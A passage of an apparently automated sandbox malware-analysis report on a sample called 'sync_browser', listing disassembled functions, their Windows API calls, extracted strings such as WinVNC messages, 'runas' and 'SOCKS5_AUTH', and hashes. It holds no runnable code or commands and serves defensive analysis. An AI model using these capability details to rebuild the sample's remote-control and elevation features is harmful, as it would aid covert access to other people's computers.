                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Version$AddressHandleInfoModuleProcSystem
                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                      • API String ID: 335284197-192647395
                                                                      • Opcode ID: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
                                                                      • Instruction ID: c55f327b0deee62cc9c9a0ef5d4615738f2811f3d3694e86a746386f825bf914
                                                                      • Opcode Fuzzy Hash: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
                                                                      • Instruction Fuzzy Hash: 6331FD25A0C68686FB70BB20F46577AB3A0FB95F14FC00436E58DC6A99EF7CD4458B11
                                                                      Function 00007FF7E50A00F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDeviceCaps.GDI32 ref: 00007FF7E50A0113
                                                                      • GetDeviceCaps.GDI32 ref: 00007FF7E50A0140
                                                                      • GetDeviceCaps.GDI32 ref: 00007FF7E50A016D
                                                                        • Part of subcall function 00007FF7E507A040: OpenInputDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A07A
                                                                        • Part of subcall function 00007FF7E507A040: GetCurrentThreadId.KERNEL32 ref: 00007FF7E507A083
                                                                        • Part of subcall function 00007FF7E507A040: GetThreadDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A08B
                                                                        • Part of subcall function 00007FF7E507A040: SetThreadDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A0A6
                                                                        • Part of subcall function 00007FF7E507A040: MessageBoxA.USER32 ref: 00007FF7E507A0B7
                                                                        • Part of subcall function 00007FF7E507A040: SetThreadDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A0C2
                                                                        • Part of subcall function 00007FF7E507A040: CloseDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A0CB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Desktop$Thread$CapsDevice$CloseCurrentInputMessageOpen
                                                                      • String ID: WinVNC$vncDesktop : current display is PLANAR, not CHUNKY!WinVNC cannot be used with this graphics device driver$vncdesktop.cpp : DBG:display context has %d planes!$vncdesktop.cpp : DBG:memory context has %d planes!
                                                                      • API String ID: 3271485511-23260621
                                                                      • Opcode ID: aceaff558d4e77a2f2eec4c4dc82cdcf6baf6394409946313555329e23b774f0
                                                                      • Instruction ID: 7162586e6a119c60ab34a7cd1984a32d7f86f4043701efdbecdf954cbd1ffb26
                                                                      • Opcode Fuzzy Hash: aceaff558d4e77a2f2eec4c4dc82cdcf6baf6394409946313555329e23b774f0
                                                                      • Instruction Fuzzy Hash: 89219E726081CA86E710AFB5D4207F86761EB58F08F880437DE8DCA699DE7CD196C332
                                                                      Function 00007FF7E5083D50 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 32COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExecuteFileForegroundModuleNameShellVersionWindow
                                                                      • String ID: -delsoftwarecad$p$runas
                                                                      • API String ID: 397093096-3343046257
                                                                      • Opcode ID: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
                                                                      • Instruction ID: 28fc8cf093ee065857378eb774e4e5ebfc2cb318333b668e7be9b471cc8019d2
                                                                      • Opcode Fuzzy Hash: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
                                                                      • Instruction Fuzzy Hash: CD11BA35518B8585E770AB10F4A939AB3A4FB88B45F801236D68D42B58EF7CD158CB51
                                                                      Function 00007FF7E51376E8 Relevance: 12.1, APIs: 8, Instructions: 59COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
                                                                      • String ID:
                                                                      • API String ID: 113790786-0
                                                                      • Opcode ID: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
                                                                      • Instruction ID: d13e902ae0f8adee88d55561680ed522808dfcc0fff7904f378ab61c186ec2e3
                                                                      • Opcode Fuzzy Hash: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
                                                                      • Instruction Fuzzy Hash: 14218925E0C64A82F660BB60B43977AA690AF41F80FC64436E50EC66C9CF3CE9409763
                                                                      Function 00007FF7E5139A94 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 240COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FF7E51337C4: GetLastError.KERNEL32(?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19,?,?,?,00007FF7E512748C), ref: 00007FF7E51337CE
                                                                        • Part of subcall function 00007FF7E51337C4: FlsGetValue.KERNEL32(?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19,?,?,?,00007FF7E512748C), ref: 00007FF7E51337DC
                                                                        • Part of subcall function 00007FF7E51337C4: FlsSetValue.KERNEL32(?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19,?,?,?,00007FF7E512748C), ref: 00007FF7E5133808
                                                                        • Part of subcall function 00007FF7E51337C4: GetCurrentThreadId.KERNEL32 ref: 00007FF7E513381C
                                                                        • Part of subcall function 00007FF7E51337C4: SetLastError.KERNEL32(?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19,?,?,?,00007FF7E512748C), ref: 00007FF7E5133834
                                                                        • Part of subcall function 00007FF7E51332EC: Sleep.KERNEL32(?,?,?,00007FF7E51337F7,?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19), ref: 00007FF7E5133331
                                                                      • _errno.LIBCMT ref: 00007FF7E5139D9C
                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E5139DA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLastValue$CurrentSleepThread_errno_invalid_parameter_noinfo
                                                                      • String ID: ;$;$JanFebMarAprMayJunJulAugSepOctNovDec$gfff
                                                                      • API String ID: 1962487656-880385205
                                                                      • Opcode ID: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
                                                                      • Instruction ID: 936b4c9af9596891b989ae80986a49cc5009374f1df8e204745952d5717f1259
                                                                      • Opcode Fuzzy Hash: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
                                                                      • Instruction Fuzzy Hash: 05914C376041858BDB099E38D4B57E87BA2D762B04F49C136D648CB79ADA3CE509C723
                                                                      Function 00007FF7E507C0C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 201networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: recv$send$_errno_invalid_parameter_noinfo_wgetenv
                                                                      • String ID: SOCKS5_AUTH
                                                                      • API String ID: 788663964-1698957378
                                                                      • Opcode ID: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
                                                                      • Instruction ID: 2087b32fe04f69f238d9e995152bc32ad75ab3d361aa70fcd6ee6a751a4cd584
                                                                      • Opcode Fuzzy Hash: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
                                                                      • Instruction Fuzzy Hash: 9381F82271C64640E7A0B639A5607BAA791FF85B94FC42233FE5D876C9EE3CD405C711
                                                                      Function 00007FF7E507CDC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 113networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: closesocketfreeinet_addrinet_ntoa$Startup_wgetenvconnectgethostbynamehtonssocket
                                                                      • String ID: 0123456789.
                                                                      • API String ID: 1515065793-2088042752
                                                                      • Opcode ID: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
                                                                      • Instruction ID: 9b92015271c51bdb152cf16201dcbd63cc8b9a0ff3b96d0b182f1fd7f8597d55
                                                                      • Opcode Fuzzy Hash: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
                                                                      • Instruction Fuzzy Hash: 07414571A0468986EB74BF3198253F9A350FF48FA4F844236EA2D876D9EE3CD5448721
                                                                      Function 00007FF7E50877C0 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 88sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterInitializeLeaveSleep
                                                                      • String ID: keyEvent$start_event$stop_event
                                                                      • API String ID: 2894921085-1979648887
                                                                      • Opcode ID: 8308cf7c3ae31cd30facc1a3198ee148bfde16ef54a6c7f1913cd50604fb2f6f
                                                                      • Instruction ID: 4fc5ca4f0610b538547f033506ad392f1d198de56f4d8890c12850804175d14b
                                                                      • Opcode Fuzzy Hash: 8308cf7c3ae31cd30facc1a3198ee148bfde16ef54a6c7f1913cd50604fb2f6f
                                                                      • Instruction Fuzzy Hash: 85415D21E19A0B91FA11BB24B471B75A790DF84F40FC40036EA4E8A7AADE3DA054C773
                                                                      Function 00007FF7E50C6FF0 Relevance: 10.6, APIs: 7, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LibraryMetricsSystem$DisplayEnumSettings$AddressFreeLoadProc
                                                                      • String ID:
                                                                      • API String ID: 3112530957-0
                                                                      • Opcode ID: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
                                                                      • Instruction ID: bbd201cbf71082e321e5627f991e44af7f9a560c2d5e366bed06fc1363da91a2
                                                                      • Opcode Fuzzy Hash: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
                                                                      • Instruction Fuzzy Hash: F24117769086C5CAE324DF38E454399BBA0F748B08F44593AEF999B749EB38D504CF21
                                                                      Function 00007FF7E50C3740 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FF7E5127BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF7E50C3771), ref: 00007FF7E5127BFE
                                                                      • GetLastError.KERNEL32 ref: 00007FF7E50C3790
                                                                      • SetLastError.KERNEL32 ref: 00007FF7E50C37B2
                                                                      • FormatMessageA.KERNEL32 ref: 00007FF7E50C37EB
                                                                      • sprintf.LIBCMT ref: 00007FF7E50C3804
                                                                        • Part of subcall function 00007FF7E512B240: _errno.LIBCMT ref: 00007FF7E512B258
                                                                        • Part of subcall function 00007FF7E512B240: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E512B263
                                                                        • Part of subcall function 00007FF7E50C3690: OutputDebugStringA.KERNEL32(?,?,?,?,?,00007FF7E50C385F), ref: 00007FF7E50C36A9
                                                                        • Part of subcall function 00007FF7E50C3690: GetStdHandle.KERNEL32(?,?,?,?,?,00007FF7E50C385F), ref: 00007FF7E50C36D1
                                                                        • Part of subcall function 00007FF7E50C3690: WriteConsoleA.KERNEL32 ref: 00007FF7E50C36EE
                                                                        • Part of subcall function 00007FF7E50C3690: WriteFile.KERNEL32(?,?,?,?,?,00007FF7E50C385F), ref: 00007FF7E50C3725
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFileLastTimeWrite$ConsoleDebugFormatHandleMessageOutputStringSystem_errno_invalid_parameter_noinfosprintf
                                                                      • String ID: --$error code 0x%08X
                                                                      • API String ID: 1897734068-3878996968
                                                                      • Opcode ID: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
                                                                      • Instruction ID: b161521fd6aa4a54a5ce76281be54c5b107ab7b143e4ca2bb03d06b5bdc92c61
                                                                      • Opcode Fuzzy Hash: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
                                                                      • Instruction Fuzzy Hash: B531C535B0878581EB20EB25F4243AAA760FB85FA4F944336EB5D876C9DF3CD0058711
                                                                      Function 00007FF7E512D58C Relevance: 10.6, APIs: 7, Instructions: 67COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __doserrno_errno
                                                                      • String ID:
                                                                      • API String ID: 921712934-0
                                                                      • Opcode ID: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
                                                                      • Instruction ID: c5abcdaff0667e54d6b9205b72d194cd76742334decc14fcdc9fb9d00751d0c8
                                                                      • Opcode Fuzzy Hash: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
                                                                      • Instruction Fuzzy Hash: 0421F126A0C68A85E3017F64F86177DA5506F82F60FC94137EA1C872DACE7CA442E732
                                                                      Function 00007FF7E5087220 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
